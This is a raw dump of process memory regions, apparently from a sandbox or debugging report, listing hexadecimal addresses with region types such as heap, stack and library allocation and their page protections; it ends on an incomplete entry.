heap
page read and write
2BEAFB03000
heap
page read and write
C860000
trusted library allocation
page read and write
C860000
trusted library allocation
page read and write
F80F000
heap
page read and write
BD958C7000
stack
page read and write
266D2F7F000
heap
page read and write
2BEAF630000
direct allocation
page read and write
2BEAFB2C000
heap
page read and write
9B16000
trusted library allocation
page read and write
3068000
direct allocation
page read and write
266D2F72000
heap
page read and write
107E1000
heap
page read and write
BD9574E000
stack
page read and write
78AC000
trusted library allocation
page read and write
2BEAD9EA000
heap
page read and write
105F7000
heap
page read and write
2BEAD9A7000
heap
page read and write
15AE000
heap
page read and write
30E9000
direct allocation
page read and write
2BEAFB2F000
heap
page read and write
C69C000
heap
page read and write
2BEAD988000
heap
page read and write
77E000
stack
page read and write
6F51000
heap
page read and write
266D2F7F000
heap
page read and write
2BEAFF01000
heap
page read and write
2BEAFF18000
heap
page read and write
3086000
direct allocation
page read and write
218FB370000
heap
page read and write
7FF8B7E16000
unkown
page readonly
220FCAB4000
heap
page read and write
21881D19000
trusted library allocation
page read and write
F740000
trusted library allocation
page read and write
2BEAD9B1000
heap
page read and write
2BEAFA59000
heap
page read and write
1578000
heap
page read and write
218FB350000
heap
page read and write
7FF8B7E40000
unkown
page readonly
266D2F79000
heap
page read and write
2BEAFF01000
heap
page read and write
2BEAFEF8000
heap
page read and write
AD0000
heap
page read and write
4461000
heap
page read and write
C860000
trusted library allocation
page read and write
2BEAD9F2000
heap
page read and write
3830000
heap
page read and write
2BEB15AA000
heap
page read and write
2BEAFAD4000
heap
page read and write
7FF8B8C10000
unkown
page readonly
2BEAFB2C000
heap
page read and write
7FF8A8990000
unkown
page readonly
2BEADAE0000
heap
page read and write
2BEAFA59000
heap
page read and write
2BEAFF18000
heap
page read and write
105A1000
heap
page read and write
3078000
direct allocation
page read and write
15F2000
heap
page read and write
1063A000
heap
page read and write
266D2F72000
heap
page read and write
8E4000
heap
page read and write
266D2F72000
heap
page read and write
8E3000
heap
page read and write
DCE0000
trusted library allocation
page read and write
2BEAD9EA000
heap
page read and write
105A3000
heap
page read and write
2BEAFF18000
heap
page read and write
266D2F7F000
heap
page read and write
266D2F72000
heap
page read and write
7FF8B7891000
unkown
page execute read
10797000
heap
page read and write
2BEAFAD9000
heap
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
266D2F80000
heap
page read and write
266D2F80000
heap
page read and write
2BEAD9BE000
heap
page read and write
144E000
stack
page read and write
9BE000
unkown
page read and write
8E4000
heap
page read and write
105ED000
heap
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
7FF8B7DF5000
unkown
page readonly
C860000
trusted library allocation
page read and write
7FF8B7E32000
unkown
page readonly
2BEAFC10000
direct allocation
page read and write
266D2F72000
heap
page read and write
7FF8B7DE4000
unkown
page read and write
218FB240000
heap
page execute and read and write
2188162C000
trusted library allocation
page read and write
7FF8B8B45000
unkown
page read and write
3B12000
unkown
page write copy
15D3000
heap
page read and write
DD90000
trusted library allocation
page read and write
7FF8B7E06000
unkown
page read and write
266D2F80000
heap
page read and write
6C70000
trusted library allocation
page read and write
DD80000
trusted library allocation
page read and write
7FF8B78A0000
unkown
page readonly
8E3000
heap
page read and write
8E3000
heap
page read and write
2BEAFB2C000
heap
page read and write
2BEAFAD0000
heap
page read and write
18E0000
direct allocation
page read and write
F740000
trusted library allocation
page read and write
15AA000
heap
page read and write
F740000
trusted library allocation
page read and write
10786000
heap
page read and write
F750000
trusted library allocation
page read and write
6C70000
trusted library allocation
page read and write
31F3000
direct allocation
page read and write
F411000
heap
page read and write
266D2F79000
heap
page read and write
30D0000
direct allocation
page read and write
2BEAD981000
heap
page read and write
F760000
trusted library allocation
page read and write
BD945FF000
stack
page read and write
266D2F7F000
heap
page read and write
8E3000
heap
page read and write
6C70000
trusted library allocation
page read and write
2BEAFAEC000
heap
page read and write
266D2F72000
heap
page read and write
2BEAD9C4000
heap
page read and write
15FD000
heap
page read and write
220FCB25000
heap
page read and write
266D2F72000
heap
page read and write
266D2F79000
heap
page read and write
2BEAFED6000
heap
page read and write
8E3000
heap
page read and write
BD94473000
stack
page read and write
2BEAFB24000
heap
page read and write
E8A95E0000
stack
page read and write
F530000
trusted library allocation
page read and write
F770000
trusted library allocation
page read and write
8E3000
heap
page read and write
DD00000
trusted library allocation
page read and write
2BEAFEF8000
heap
page read and write
7FF8B8791000
unkown
page execute read
4040000
heap
page read and write
C860000
trusted library allocation
page read and write
2BEAD998000
heap
page read and write
8E3000
heap
page read and write
F750000
trusted library allocation
page read and write
2BEAFF01000
heap
page read and write
266D2E80000
heap
page read and write
9DD000
heap
page read and write
7FF8B7DF3000
unkown
page readonly
266D2F72000
heap
page read and write
2BEAFB80000
direct allocation
page read and write
10724000
heap
page read and write
2BEAD97F000
heap
page read and write
C79D000
heap
page read and write
8E3000
heap
page read and write
C860000
trusted library allocation
page read and write
7FF692A0D000
unkown
page readonly
7FF8B9842000
unkown
page readonly
6C7A000
heap
page read and write
31C8000
direct allocation
page read and write
43E1000
heap
page read and write
7FF8B8CB0000
unkown
page readonly
441D000
heap
page read and write
8E3000
heap
page read and write
2BEAD970000
heap
page read and write
2BEAFF01000
heap
page read and write
10753000
heap
page read and write
218FB790000
heap
page read and write
15B3000
heap
page read and write
2BEAFEE6000
heap
page read and write
F740000
trusted library allocation
page read and write
2BEAFEE6000
heap
page read and write
10644000
heap
page read and write
2BEAFF01000
heap
page read and write
4468000
heap
page read and write
2BEAD9C4000
heap
page read and write
41DE000
stack
page read and write
220FCAE7000
heap
page read and write
1310000
heap
page read and write
3700000
direct allocation
page read and write
132C000
stack
page read and write
359000
stack
page read and write
72FF000
trusted library allocation
page read and write
24E56F70000
heap
page read and write
105C7000
heap
page read and write
7FF8B7DF0000
unkown
page readonly
218FB290000
heap
page read and write
2BEAD9B6000
heap
page read and write
6C7B000
heap
page read and write
2BEAFB21000
heap
page read and write
2BEAD9B1000
heap
page read and write
8E3000
heap
page read and write
BD94A39000
stack
page read and write
2BEAD998000
heap
page read and write
10631000
heap
page read and write
2BEAFBC0000
direct allocation
page read and write
2BEADA05000
heap
page read and write
F218000
heap
page read and write
15EA000
heap
page read and write
FA548FE000
unkown
page read and write
218F90F0000
heap
page read and write
1920000
heap
page read and write
2BEAFB2D000
heap
page read and write
7CBF000
heap
page read and write
220FCB5F000
heap
page read and write
8E3000
heap
page read and write
2BEAD9A2000
heap
page read and write
8E3000
heap
page read and write
2BEAFA00000
direct allocation
page read and write
220FCAF3000
heap
page read and write
6E87000
heap
page read and write
F764000
trusted library allocation
page read and write
F74C000
trusted library allocation
page read and write
218F90C0000
heap
page read and write
266D2F7F000
heap
page read and write
7624000
trusted library allocation
page read and write
2BEAFA00000
direct allocation
page read and write
C722000
heap
page read and write
2BEAFEE4000
heap
page read and write
7FF8B8835000
unkown
page readonly
7FF692A0D000
unkown
page readonly
7FF8492A0000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
266D2F7F000
heap
page read and write
C860000
trusted library allocation
page read and write
218FABA0000
heap
page execute and read and write
7FF692A26000
unkown
page readonly
7FF8B7E05000
unkown
page readonly
8E8000
heap
page read and write
2BEAFAED000
heap
page read and write
24E56FF0000
heap
page read and write
10708000
heap
page read and write
30D9000
direct allocation
page read and write
266D2F70000
heap
page read and write
31B2000
direct allocation
page read and write
2BEAD9F2000
heap
page read and write
2BEAFB2D000
heap
page read and write
7442000
trusted library allocation
page read and write
3194000
direct allocation
page read and write
2BEAFB2C000
heap
page read and write
35C0000
direct allocation
page read and write
F21C000
heap
page read and write
2BEADA09000
heap
page read and write
7FF8BA251000
unkown
page readonly
2BEAFE60000
direct allocation
page read and write
7FF8B8CB3000
unkown
page readonly
F740000
trusted library allocation
page read and write
F7F0000
trusted library allocation
page read and write
3176000
direct allocation
page read and write
15C1000
heap
page read and write
1064E000
heap
page read and write
C7C6000
heap
page read and write
7FF84924B000
trusted library allocation
page read and write
EE11000
heap
page read and write
2BEAD9AC000
heap
page read and write
7FF8B8833000
unkown
page readonly
2BEAD970000
heap
page read and write
C860000
trusted library allocation
page read and write
220FCAA8000
heap
page read and write
15E1000
heap
page read and write
15C5000
heap
page read and write
2BEAFEF1000
heap
page read and write
F61C000
heap
page read and write
2BEAD9C4000
heap
page read and write
2BEAFB2D000
heap
page read and write
2BEAFCA0000
direct allocation
page read and write
2BEAFEF4000
heap
page read and write
8E4000
heap
page read and write
2BEAF2C0000
heap
page read and write
8E3000
heap
page read and write
10728000
heap
page read and write
43E1000
heap
page read and write
2BEAFB1D000
heap
page read and write
9CFA000
heap
page read and write
2BEAFA4D000
heap
page read and write
10751000
heap
page read and write
266D2F79000
heap
page read and write
2BEAD9EA000
heap
page read and write
186E000
stack
page read and write
106E8000
heap
page read and write
8E3000
heap
page read and write
9DB3000
heap
page read and write
BD957CF000
stack
page read and write
266D2F7F000
heap
page read and write
6C70000
trusted library allocation
page read and write
1079E000
heap
page read and write
7FF8BA4F8000
unkown
page read and write
7F80B000
direct allocation
page read and write
2BEAD9B1000
heap
page read and write
2BEAD9EA000
heap
page read and write
2BEAD900000
heap
page read and write
2BEAFB2C000
heap
page read and write
7FF849174000
trusted library allocation
page read and write
218FB47A000
heap
page read and write
2BEAD9EF000
heap
page read and write
9B4E000
heap
page read and write
266D2F79000
heap
page read and write
2BEAFC60000
direct allocation
page read and write
2BEAD988000
heap
page read and write
2BEAFEF8000
heap
page read and write
7FF000
stack
page read and write
2BEAFF18000
heap
page read and write
6C76000
trusted library allocation
page read and write
C860000
trusted library allocation
page read and write
2BEADA00000
heap
page read and write
1071F000
heap
page read and write
266D2F72000
heap
page read and write
3036000
direct allocation
page read and write
7FF692A26000
unkown
page readonly
8E4000
heap
page read and write
86B2000
heap
page read and write
B22000
heap
page read and write
30F6000
direct allocation
page read and write
266D2F7B000
heap
page read and write
7585000
trusted library allocation
page read and write
8E4000
heap
page read and write
317D000
direct allocation
page read and write
7FF8B8C11000
unkown
page execute read
266D2EC0000
heap
page read and write
F263000
heap
page read and write
266D2F80000
heap
page read and write
2BEAD970000
heap
page read and write
8D0000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
8E3000
heap
page read and write
3158000
direct allocation
page read and write
7FF8B7E25000
unkown
page readonly
2BEAFAFD000
heap
page read and write
8E3000
heap
page read and write
6D60000
trusted library allocation
page read and write
BD94ABE000
stack
page read and write
8E3000
heap
page read and write
2BEAFB2D000
heap
page read and write
266D2F72000
heap
page read and write
2BEAFEE6000
heap
page read and write
218FB52B000
heap
page read and write
6C7A000
heap
page read and write
10652000
heap
page read and write
1380000
heap
page read and write
6C70000
trusted library allocation
page read and write
1059A000
heap
page read and write
2BEAFF01000
heap
page read and write
7FF848EC6000
trusted library allocation
page read and write
10613000
heap
page read and write
30F0000
direct allocation
page read and write
8E3000
heap
page read and write
BD94937000
stack
page read and write
2BEAD998000
heap
page read and write
2BEAFB2D000
heap
page read and write
6F0000
heap
page read and write
1069C000
heap
page read and write
3106000
direct allocation
page read and write
2BEAFAFE000
heap
page read and write
24E57010000
heap
page read and write
2BEAD983000
heap
page read and write
8E3000
heap
page read and write
F750000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
2BEAFAFE000
heap
page read and write
9D7000
unkown
page readonly
C860000
trusted library allocation
page read and write
218FB4E2000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
218FB2E9000
heap
page read and write
3653000
heap
page read and write
8E3000
heap
page read and write
6D60000
trusted library allocation
page read and write
442000
unkown
page read and write
2BEAD9EB000
heap
page read and write
73E000
stack
page read and write
105E2000
heap
page read and write
266D2F79000
heap
page read and write
10763000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
6652000
direct allocation
page read and write
2BEAFF01000
heap
page read and write
BD9568E000
stack
page read and write
266D49B0000
heap
page read and write
15DC000
heap
page read and write
10622000
heap
page read and write
C860000
trusted library allocation
page read and write
2BEB00DA000
heap
page read and write
710000
unkown
page readonly
F740000
trusted library allocation
page read and write
AAE000
heap
page read and write
7FF8B7DE0000
unkown
page readonly
1074E000
heap
page read and write
266D2F7C000
heap
page read and write
C860000
trusted library allocation
page read and write
3131000
direct allocation
page read and write
2BEAFB2D000
heap
page read and write
7FF8B7DF1000
unkown
page execute read
266D2F72000
heap
page read and write
1060A000
heap
page read and write
4020000
direct allocation
page read and write
FA549FF000
stack
page read and write
6E51000
heap
page read and write
319B000
direct allocation
page read and write
7FF8B8830000
unkown
page readonly
2BEAFEF1000
heap
page read and write
2BEAFB2C000
heap
page read and write
10705000
heap
page read and write
1061E000
heap
page read and write
9B10000
trusted library allocation
page read and write
B26000
heap
page read and write
7FF8A8DE0000
unkown
page readonly
7FF8BFAB9000
unkown
page readonly
7FF8B78B0000
unkown
page readonly
2BEAFEE1000
heap
page read and write
F616000
heap
page read and write
8E3000
heap
page read and write
DA1000
unkown
page execute read
8E3000
heap
page read and write
266D2F80000
heap
page read and write
2BEAFEE0000
heap
page read and write
BD9570D000
stack
page read and write
3650000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
8E3000
heap
page read and write
2BEAFEF4000
heap
page read and write
106A3000
heap
page read and write
7FF8B7E41000
unkown
page execute read
8E3000
heap
page read and write
9D4B000
heap
page read and write
2BEAD9EF000
heap
page read and write
4150000
direct allocation
page read and write
8E3000
heap
page read and write
1396000
heap
page read and write
1059D000
heap
page read and write
15F8000
heap
page read and write
2BEAD9B1000
heap
page read and write
1390000
heap
page read and write
2BEAFF18000
heap
page read and write
7FF8B7833000
unkown
page readonly
21880083000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
F740000
trusted library allocation
page read and write
266D2F7F000
heap
page read and write
2BEAFAF6000
heap
page read and write
2BEAD9D8000
heap
page read and write
7FF8B78C1000
unkown
page execute read
2BEAFAEB000
heap
page read and write
AD7000
heap
page read and write
266D2F7F000
heap
page read and write
218FB200000
heap
page read and write
218F90D0000
heap
page read and write
2BEAFA7D000
heap
page read and write
2BEAFF18000
heap
page read and write
15AE000
heap
page read and write
2BEAFB2C000
heap
page read and write
266D2F72000
heap
page read and write
2BEAFA41000
heap
page read and write
105FE000
heap
page read and write
7FF6929E1000
unkown
page execute read
30F8000
direct allocation
page read and write
8E4000
heap
page read and write
308D000
direct allocation
page read and write
BD947FD000
stack
page read and write
218F9191000
heap
page read and write
8E3000
heap
page read and write
7FF8A8E04000
unkown
page readonly
2BEAFF18000
heap
page read and write
9DC0000
trusted library allocation
page read and write
2BEAFF01000
heap
page read and write
311C000
direct allocation
page read and write
7FF8BA240000
unkown
page readonly
6C70000
trusted library allocation
page read and write
911B000
heap
page read and write
2BEAFA41000
heap
page read and write
2BEAFA00000
direct allocation
page read and write
2BEAFED1000
heap
page read and write
8E3000
heap
page read and write
1840000
heap
page read and write
8E3000
heap
page read and write
2BEADA01000
heap
page read and write
266D2F72000
heap
page read and write
9DC4000
trusted library allocation
page read and write
2BEAFEE6000
heap
page read and write
266D2E90000
heap
page read and write
316E000
direct allocation
page read and write
430E000
direct allocation
page read and write
7FF8B7835000
unkown
page readonly
10601000
heap
page read and write
218FB57C000
heap
page read and write
2BEAD98D000
heap
page read and write
C860000
trusted library allocation
page read and write
24E57010000
heap
page read and write
36EF000
direct allocation
page read and write
2BEAD9EA000
heap
page read and write
2BEAFF01000
heap
page read and write
DE90000
trusted library allocation
page read and write
266D2F7F000
heap
page read and write
8E3000
heap
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
7FF849090000
trusted library allocation
page read and write
8E3000
heap
page read and write
17A1000
unkown
page execute read
266D2F80000
heap
page read and write
C870000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
8E3000
heap
page read and write
2BEAD9C4000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
7FF8B9840000
unkown
page readonly
266D2F80000
heap
page read and write
218FB247000
heap
page execute and read and write
9D74000
heap
page read and write
7F53000
heap
page read and write
9BE000
unkown
page write copy
9DC0000
trusted library allocation
page read and write
8E3000
heap
page read and write
AD7000
heap
page read and write
439000
unkown
page write copy
7FF8490C0000
trusted library allocation
page read and write
8E3000
heap
page read and write
DE90000
trusted library allocation
page read and write
2BEAFB02000
heap
page read and write
266D2F79000
heap
page read and write
9F40000
trusted library allocation
page read and write
7FF848E6C000
trusted library allocation
page execute and read and write
BD9467D000
stack
page read and write
7FF8A8EEF000
unkown
page read and write
30FF000
direct allocation
page read and write
8E3000
heap
page read and write
2BEAFEE6000
heap
page read and write
266D2F80000
heap
page read and write
7FF8B78A1000
unkown
page execute read
7FF8B7E63000
unkown
page readonly
220FCA8C000
heap
page read and write
2BEAF670000
direct allocation
page read and write
7FF8B93D2000
unkown
page read and write
218901B2000
trusted library allocation
page read and write
10781000
heap
page read and write
15EA000
heap
page read and write
218F91AF000
heap
page read and write
2BEAF870000
direct allocation
page read and write
218FAC30000
trusted library allocation
page read and write
8E3000
heap
page read and write
2BEAFEF1000
heap
page read and write
266D2F80000
heap
page read and write
2188191A000
trusted library allocation
page read and write
8E3000
heap
page read and write
7FF8B8B46000
unkown
page readonly
C860000
trusted library allocation
page read and write
7FF8BA4F9000
unkown
page readonly
F45C000
heap
page read and write
F770000
trusted library allocation
page read and write
2BEAFEE6000
heap
page read and write
266D2F72000
heap
page read and write
2BEAFEE6000
heap
page read and write
158E000
stack
page read and write
739F000
trusted library allocation
page read and write
218FB4B9000
heap
page read and write
2BEAD9EB000
heap
page read and write
1072C000
heap
page read and write
9F40000
trusted library allocation
page read and write
6D70000
trusted library allocation
page read and write
7FF8491E4000
trusted library allocation
page read and write
266D2F79000
heap
page read and write
2BEAFEEF000
heap
page read and write
8E3000
heap
page read and write
266D2F72000
heap
page read and write
C87E000
heap
page read and write
2BEAFAF6000
heap
page read and write
7FF8B78C0000
unkown
page readonly
8E3000
heap
page read and write
8E3000
heap
page read and write
2BEAFA00000
direct allocation
page read and write
2BEAFA50000
heap
page read and write
2BEAD9A4000
heap
page read and write
F760000
trusted library allocation
page read and write
F800000
trusted library allocation
page read and write
7FF849260000
trusted library allocation
page read and write
C860000
trusted library allocation
page read and write
7FF8B8B02000
unkown
page readonly
DDA0000
trusted library allocation
page read and write
15D0000
heap
page read and write
10649000
heap
page read and write
158E000
heap
page read and write
AE6000
heap
page read and write
2BEAFB2C000
heap
page read and write
107BA000
heap
page read and write
7FF8B8B0E000
unkown
page read and write
739B000
trusted library allocation
page read and write
7440000
trusted library allocation
page read and write
2BEAFAFD000
heap
page read and write
F740000
trusted library allocation
page read and write
2BEAFAC8000
heap
page read and write
5C00000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
2BEAFA59000
heap
page read and write
1397000
heap
page read and write
2BEAFB2C000
heap
page read and write
266D2F72000
heap
page read and write
2BEAFEF8000
heap
page read and write
9BD1000
heap
page read and write
7FF849000000
trusted library allocation
page execute and read and write
15FA000
heap
page read and write
2BEAD981000
heap
page read and write
E8A9BBE000
stack
page read and write
8E3000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
2BEAFF01000
heap
page read and write
2BEAFAEA000
heap
page read and write
7FA4000
heap
page read and write
266D2F72000
heap
page read and write
F760000
trusted library allocation
page read and write
C74C000
heap
page read and write
7151000
heap
page read and write
6C75000
trusted library allocation
page read and write
266D2F7D000
heap
page read and write
2BEAFEF8000
heap
page read and write
7F51B000
direct allocation
page read and write
7FF8BA4F5000
unkown
page readonly
2BEAFAF6000
heap
page read and write
1850000
heap
page read and write
2BEAF6F0000
direct allocation
page read and write
8E3000
heap
page read and write
7FF8A8F0C000
unkown
page read and write
6C70000
trusted library allocation
page read and write
17A1000
unkown
page execute read
21881AC3000
trusted library allocation
page read and write
7FF692A26000
unkown
page readonly
8E3000
heap
page read and write
2BEAFAC8000
heap
page read and write
F740000
trusted library allocation
page read and write
8E3000
heap
page read and write
218F9340000
trusted library allocation
page read and write
F740000
trusted library allocation
page read and write
1062E000
heap
page read and write
8A02000
heap
page read and write
F740000
trusted library allocation
page read and write
C860000
trusted library allocation
page read and write
2BEAFD80000
direct allocation
page read and write
105EB000
heap
page read and write
6806000
direct allocation
page read and write
C860000
trusted library allocation
page read and write
C860000
trusted library allocation
page read and write
E8A99CE000
stack
page read and write
7FF8B7E23000
unkown
page readonly
7FF8A8F17000
unkown
page readonly
DA0000
unkown
page readonly
266D2F7F000
heap
page read and write
2BEADA06000
heap
page read and write
12FC000
stack
page read and write
7FF8B8F71000
unkown
page execute read
C868000
heap
page read and write
F770000
trusted library allocation
page read and write
7FF8B7895000
unkown
page read and write
2BEAFAF5000
heap
page read and write
E8A97DE000
stack
page read and write
1540000
heap
page read and write
266D2F7F000
heap
page read and write
2BEAFF01000
heap
page read and write
266D2F80000
heap
page read and write
2BEAFB24000
heap
page read and write
BD94CBB000
stack
page read and write
7FF8B7E10000
unkown
page readonly
8E3000
heap
page read and write
8E3000
heap
page read and write
2BEAFEE6000
heap
page read and write
300B000
direct allocation
page read and write
90E2000
heap
page read and write
2BEADA02000
heap
page read and write
7FF8A8EEA000
unkown
page read and write
2BEAFEE6000
heap
page read and write
3019000
direct allocation
page read and write
7FF8B7DE3000
unkown
page readonly
6C70000
trusted library allocation
page read and write
2BEAFAC8000
heap
page read and write
15B6000
heap
page read and write
7FF849280000
trusted library allocation
page read and write
2BEAFA57000
heap
page read and write
441E000
heap
page read and write
43E1000
heap
page read and write
7FF8A8EAB000
unkown
page read and write
15AA000
heap
page read and write
2BEAFB2C000
heap
page read and write
10718000
heap
page read and write
31FA000
direct allocation
page read and write
21880C2C000
trusted library allocation
page read and write
F7F0000
trusted library allocation
page read and write
30DA000
direct allocation
page read and write
3123000
direct allocation
page read and write
6C70000
trusted library allocation
page read and write
BD94C3C000
stack
page read and write
2BEAFEF1000
heap
page read and write
F740000
trusted library allocation
page read and write
266D2F70000
heap
page read and write
266D2F72000
heap
page read and write
8E4000
heap
page read and write
9B10000
trusted library allocation
page read and write
2BEAFEF8000
heap
page read and write
15ED000
heap
page read and write
266D2F79000
heap
page read and write
24E57010000
heap
page read and write
304B000
direct allocation
page read and write
218FABF0000
heap
page read and write
2BEAFEE6000
heap
page read and write
1074C000
heap
page read and write
BD94BBF000
stack
page read and write
7FF8B9F6F000
unkown
page readonly
F267000
heap
page read and write
2BEAFAF6000
heap
page read and write
F61A000
heap
page read and write
6C75000
trusted library allocation
page read and write
8E3000
heap
page read and write
7FF692A20000
unkown
page write copy
8E3000
heap
page read and write
21881921000
trusted library allocation
page read and write
7FF849120000
trusted library allocation
page read and write
8E3000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
2BEAFB2C000
heap
page read and write
3201000
direct allocation
page read and write
8E3000
heap
page read and write
8E3000
heap
page read and write
2BEAFAF5000
heap
page read and write
2BEAFA54000
heap
page read and write
2BEAF8B0000
direct allocation
page read and write
10638000
heap
page read and write
2BEAFF01000
heap
page read and write
21890001000
trusted library allocation
page read and write
BD948BE000
stack
page read and write
266D2F80000
heap
page read and write
2BEAFB06000
heap
page read and write
7FF8492B0000
trusted library allocation
page read and write
1064B000
heap
page read and write
218FB469000
heap
page read and write
2BEAFB2C000
heap
page read and write
218F9150000
heap
page read and write
2BEAFB05000
heap
page read and write
2BEAD970000
heap
page read and write
7FF8B9F75000
unkown
page readonly
7FF8B8B39000
unkown
page readonly
7FF8490A0000
trusted library allocation
page read and write
2BEAFB02000
heap
page read and write
10721000
heap
page read and write
2BEAFAF3000
heap
page read and write
218FAD20000
heap
page read and write
10689000
heap
page read and write
266D2F7F000
heap
page read and write
8E3000
heap
page read and write
F7F0000
trusted library allocation
page read and write
4020000
direct allocation
page read and write
30D1000
direct allocation
page read and write
F740000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
3104000
direct allocation
page read and write
4348000
direct allocation
page read and write
218FBCE0000
heap
page read and write
2BEAD9A7000
heap
page read and write
8E3000
heap
page read and write
C860000
trusted library allocation
page read and write
31D6000
direct allocation
page read and write
266D2F7F000
heap
page read and write
390000
unkown
page readonly
21881923000
trusted library allocation
page read and write
C860000
trusted library allocation
page read and write
7FF8BA241000
unkown
page execute read
380F000
direct allocation
page read and write
105D1000
heap
page read and write
9C5000
unkown
page read and write
F760000
trusted library allocation
page read and write
8E3000
heap
page read and write
4422000
heap
page read and write
266D2F72000
heap
page read and write
266D2F7F000
heap
page read and write
7FF8A8D9E000
unkown
page readonly
107BD000
heap
page read and write
9B5E000
heap
page read and write
2BEAD981000
heap
page read and write
2BEAFEEF000
heap
page read and write
93BB000
heap
page read and write
30E2000
direct allocation
page read and write
6D70000
trusted library allocation
page read and write
7FF8B7890000
unkown
page readonly
C0EDBED000
stack
page read and write
2BEB017E000
heap
page read and write
7FF8B8F70000
unkown
page readonly
F269000
heap
page read and write
1079B000
heap
page read and write
2BEAFB2C000
heap
page read and write
7FF848FC0000
trusted library allocation
page read and write
10608000
heap
page read and write
2BEAD9B1000
heap
page read and write
2BEAD9A2000
heap
page read and write
2BEAD998000
heap
page read and write
7FF8B7E51000
unkown
page readonly
3053000
direct allocation
page read and write
8E3000
heap
page read and write
2BEAFEE6000
heap
page read and write
8E3000
heap
page read and write
C860000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
7FF8B7834000
unkown
page read and write
2BEAFF01000
heap
page read and write
7FF8B7841000
unkown
page execute read
2BEAD9EA000
heap
page read and write
7FF8B7896000
unkown
page readonly
7FF8A8B11000
unkown
page execute read
2BEAFD00000
direct allocation
page read and write
2BEAFEF8000
heap
page read and write
2BEAFEE4000
heap
page read and write
2BEADA02000
heap
page read and write
449000
unkown
page readonly
15F5000
heap
page read and write
7FF8B7E07000
unkown
page readonly
BD9493E000
stack
page read and write
7FF8B7831000
unkown
page execute read
218F9130000
heap
page read and write
2BEAFB39000
heap
page read and write
218FB563000
heap
page read and write
2BEAFEF1000
heap
page read and write
6C70000
trusted library allocation
page read and write
3012000
direct allocation
page read and write
2BEAFEE6000
heap
page read and write
7BE000
stack
page read and write
218FAD25000
heap
page read and write
7FF6929E1000
unkown
page execute read
266D2F79000
heap
page read and write
7FF6929E0000
unkown
page readonly
15DD000
heap
page read and write
7FF692A0D000
unkown
page readonly
8E3000
heap
page read and write
8E4000
heap
page read and write
1071A000
heap
page read and write
2BEAFEE6000
heap
page read and write
266D2F80000
heap
page read and write
3044000
direct allocation
page read and write
8E3000
heap
page read and write
2BEAD968000
heap
page read and write
7FF8B9F60000
unkown
page readonly
7FF849150000
trusted library allocation
page read and write
2BEAD94C000
heap
page read and write
8E3000
heap
page read and write
2BEAFEE6000
heap
page read and write
6D70000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
43E1000
heap
page read and write
31A4000
direct allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
2BEAFB2D000
heap
page read and write
266D2F72000
heap
page read and write
9CA9000
heap
page read and write
8E3000
heap
page read and write
24E57010000
heap
page read and write
266D2F72000
heap
page read and write
3208000
direct allocation
page read and write
2BEAFEF4000
heap
page read and write
6C80000
trusted library allocation
page read and write
218F91D7000
heap
page read and write
2BEAFF03000
heap
page read and write
3D0000
heap
page read and write
2BEAFEEF000
heap
page read and write
218F9370000
heap
page readonly
7C86000
heap
page read and write
86EA000
heap
page read and write
4339000
direct allocation
page read and write
C860000
trusted library allocation
page read and write
6C70000
trusted library allocation
page read and write
266D4B80000
heap
page read and write
2BEAFF01000
heap
page read and write
F740000
trusted library allocation
page read and write
F740000
trusted library allocation
page read and write
BD944FE000
stack
page read and write
2BEAD981000
heap
page read and write
DD10000
trusted library allocation
page read and write
6E00000
trusted library allocation
page read and write
10657000
heap
page read and write
266D2F77000
heap
page read and write
A28000
unkown
page readonly
C817000
heap
page read and write
2BEAD9EB000
heap
page read and write
2BEAD9B3000
heap
page read and write
31E4000
direct allocation
page read and write
8E3000
heap
page read and write
266D2F72000
heap
page read and write
2BEAF2C4000
heap
page read and write
8E3000
heap
page read and write
2BEAFEF1000
heap
page read and write
15D0000
heap
page read and write
F740000
trusted library allocation
page read and write
2BEAFEF8000
heap
page read and write
266D2F72000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
10768000
heap
page read and write
6C70000
trusted library allocation
page read and write
7FF8B7E01000
unkown
page execute read
2BEAFB2D000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
2BEAFEF1000
heap
page read and write
8E3000
heap
page read and write
4460000
heap
page read and write
AB2000
heap
page read and write
7FF8B7E21000
unkown
page execute read
8E4000
heap
page read and write
9B14000
heap
page read and write
106FB000
heap
page read and write
2BEAFAFF000
heap
page read and write
7FF8B78C4000
unkown
page readonly
7FF8B8C13000
unkown
page readonly
9DC0000
trusted library allocation
page read and write
7FF849250000
trusted library allocation
page read and write
7FF8BA4F0000
unkown
page readonly
3820000
trusted library allocation
page read and write
266D2F58000
heap
page read and write
2BEAFB2C000
heap
page read and write
15C1000
heap
page read and write
30FD000
direct allocation
page read and write
9B46000
heap
page read and write
266D2F79000
heap
page read and write
2BEAFF01000
heap
page read and write
F750000
trusted library allocation
page read and write
307F000
direct allocation
page read and write
8E3000
heap
page read and write
FAB000
stack
page read and write
218FB450000
heap
page read and write
6C70000
trusted library allocation
page read and write
220FC9A0000
heap
page read and write
2BEAFF01000
heap
page read and write
2BEAFF01000
heap
page read and write
266D2F7F000
heap
page read and write
2BEAFEE6000
heap
page read and write
2BEAFF18000
heap
page read and write
6C75000
trusted library allocation
page read and write
F750000
trusted library allocation
page read and write
2BEAFF01000
heap
page read and write
7FF8B9841000
unkown
page execute read
266D2F72000
heap
page read and write
14EE000
stack
page read and write
2BEAD9B1000
heap
page read and write
10740000
heap
page read and write
F740000
trusted library allocation
page read and write
7FF692A20000
unkown
page read and write
5AC0000
heap
page read and write
15FC000
heap
page read and write
2BEAFB2D000
heap
page read and write
9C81000
heap
page read and write
8E3000
heap
page read and write
218F9232000
